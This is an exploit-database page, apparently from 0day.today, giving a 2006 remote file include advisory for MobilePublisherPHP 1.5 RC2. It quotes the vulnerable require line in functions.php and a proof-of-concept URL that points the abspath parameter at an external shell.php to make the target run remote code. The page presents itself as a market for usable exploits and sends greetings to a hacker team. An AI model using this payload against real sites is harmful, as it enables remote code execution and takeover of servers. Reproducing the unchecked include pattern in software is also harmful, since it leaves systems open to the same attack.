[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MobilePublisherPHP <= 1.5 RC2 Remote File Include Vulnerability

Author
Timq
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-848
Category
web applications
Date add
16-09-2006
Platform
unsorted
===============================================================
MobilePublisherPHP <= 1.5 RC2 Remote File Include Vulnerability
===============================================================


MobilePublisherPHP 1.5 RC2 (functions.php)Remote Include Vulnerability

##################################################################

Discovered by: Timq
http://www.securitydb.org

Team-Rootshell
##################################################################

http://www.securitydb.org

Team-Rootshell
##################################################################

Vulnerable: require $abspath."/functions.php";

###################################################################

Exploit PoC:

http://site.com/[dir]/header.php?abspath=http://site.com/shell.php?


####################################################################

Shoutz: Warpboy,Z66,Gammarays,Archangel,Cm2,Splinter,InTel,Preddy,Ice,ErazerZ,Maggot
PunKerX,Pepin,Ender


#####################################################################


#  0day.today [2024-11-15]  #